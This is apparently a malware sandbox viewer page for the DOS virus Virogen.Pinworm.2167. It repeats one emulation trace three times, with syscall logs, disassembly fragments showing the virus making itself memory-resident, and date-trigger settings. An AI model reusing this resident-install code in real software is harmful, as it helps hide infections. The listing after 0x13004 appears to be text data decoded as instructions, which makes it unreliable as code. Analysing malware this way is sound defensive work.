Sample viewer

vx.netlux.org/Virus.DOS.Virogen.Pinworm.2167

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:29:11.342623486Z 250 PC: 12bbd | UNKNOWN!
2018-12-17T22:29:11.344743373Z 42 PC: 12bc5 | Get date 0x12bc5: cmp dl, 0x13
0x12bc8: jne 0x12bd1
0x12bca: mov byte ptr cs:[bp + 0x69f], 1
0x12bd0: nop
0x12bd1: mov ax, es
0x12bd3: dec ax
0x12bd4: mov ds, ax
0x12bd6: cmp byte ptr [0], 0x5a
0x12bdb: jne 0x12c22
0x12bdd: sub word ptr [3], 0x180
0x12be3: sub word ptr [0x12], 0x180
0x12be9: mov es, word ptr [0x12]
0x12bed: push cs
0x12bee: pop ds
0x12bef: mov si, bp
0x12bf1: mov cx, 0x438
0x12bf4: xor di, di
0x12bf6: rep movsd dword ptr es:[di], dword ptr [si]
0x12bf8: xor ax, ax
0x12bfa: mov ds, ax
2018-12-17T22:29:11.347883493Z 44 PC: 13003 | Get time 0x13003: ret
0x13004: and byte ptr [bx + 0x20], bl
0x13007: push ax
0x13008: dec cx
0x13009: pop di
0x1300a: push di
0x1300b: pop di
0x1300c: jb 0x1305b
0x1300e: pop di
0x1300f: jbe 0x13042
0x13011: xor byte ptr cs:[bx + si], dh
0x13014: and byte ptr [di], ch
0x13016: and byte ptr [bp + di + 0x6f], al
0x13019: and byte ptr fs:[bp + si + 0x79], ah
0x1301f: and byte ptr [bx + 0x69], bl
0x13022: jb 0x13093
0x13024: outsb dx, byte ptr gs:[esi]
0x13027: and byte ptr [bx + di + 0x6e], ch
0x1302a: and byte ptr [bx + di + 0x70], al
0x1302d: jb 0x13098

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5212,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:58.694681895Z 250 PC: 12bbd | UNKNOWN!
2018-12-25T11:53:58.696061349Z 42 PC: 12bc5 | Get date 0x12bc5: cmp dl, 0x13
0x12bc8: jne 0x12bd1
0x12bca: mov byte ptr cs:[bp + 0x69f], 1
0x12bd0: nop
0x12bd1: mov ax, es
0x12bd3: dec ax
0x12bd4: mov ds, ax
0x12bd6: cmp byte ptr [0], 0x5a
0x12bdb: jne 0x12c22
0x12bdd: sub word ptr [3], 0x180
0x12be3: sub word ptr [0x12], 0x180
0x12be9: mov es, word ptr [0x12]
0x12bed: push cs
0x12bee: pop ds
0x12bef: mov si, bp
0x12bf1: mov cx, 0x438
0x12bf4: xor di, di
0x12bf6: rep movsd dword ptr es:[di], dword ptr [si]
0x12bf8: xor ax, ax
0x12bfa: mov ds, ax
2018-12-25T11:53:58.697813709Z 44 PC: 13003 | Get time 0x13003: ret
0x13004: and byte ptr [bx + 0x20], bl
0x13007: push ax
0x13008: dec cx
0x13009: pop di
0x1300a: push di
0x1300b: pop di
0x1300c: jb 0x1305b
0x1300e: pop di
0x1300f: jbe 0x13042
0x13011: xor byte ptr cs:[bx + si], dh
0x13014: and byte ptr [di], ch
0x13016: and byte ptr [bp + di + 0x6f], al
0x13019: and byte ptr fs:[bp + si + 0x79], ah
0x1301f: and byte ptr [bx + 0x69], bl
0x13022: jb 0x13093
0x13024: outsb dx, byte ptr gs:[esi]
0x13027: and byte ptr [bx + di + 0x6e], ch
0x1302a: and byte ptr [bx + di + 0x70], al
0x1302d: jb 0x13098

{"DateBased":true,"Day":19,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5212,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:58.814296154Z 250 PC: 12bbd | UNKNOWN!
2018-12-25T11:53:58.815563935Z 42 PC: 12bc5 | Get date 0x12bc5: cmp dl, 0x13
0x12bc8: jne 0x12bd1
0x12bca: mov byte ptr cs:[bp + 0x69f], 1
0x12bd0: nop
0x12bd1: mov ax, es
0x12bd3: dec ax
0x12bd4: mov ds, ax
0x12bd6: cmp byte ptr [0], 0x5a
0x12bdb: jne 0x12c22
0x12bdd: sub word ptr [3], 0x180
0x12be3: sub word ptr [0x12], 0x180
0x12be9: mov es, word ptr [0x12]
0x12bed: push cs
0x12bee: pop ds
0x12bef: mov si, bp
0x12bf1: mov cx, 0x438
0x12bf4: xor di, di
0x12bf6: rep movsd dword ptr es:[di], dword ptr [si]
0x12bf8: xor ax, ax
0x12bfa: mov ds, ax
2018-12-25T11:53:58.817988277Z 44 PC: 13003 | Get time 0x13003: ret
0x13004: and byte ptr [bx + 0x20], bl
0x13007: push ax
0x13008: dec cx
0x13009: pop di
0x1300a: push di
0x1300b: pop di
0x1300c: jb 0x1305b
0x1300e: pop di
0x1300f: jbe 0x13042
0x13011: xor byte ptr cs:[bx + si], dh
0x13014: and byte ptr [di], ch
0x13016: and byte ptr [bp + di + 0x6f], al
0x13019: and byte ptr fs:[bp + si + 0x79], ah
0x1301f: and byte ptr [bx + 0x69], bl
0x13022: jb 0x13093
0x13024: outsb dx, byte ptr gs:[esi]
0x13027: and byte ptr [bx + di + 0x6e], ch
0x1302a: and byte ptr [bx + di + 0x70], al
0x1302d: jb 0x13098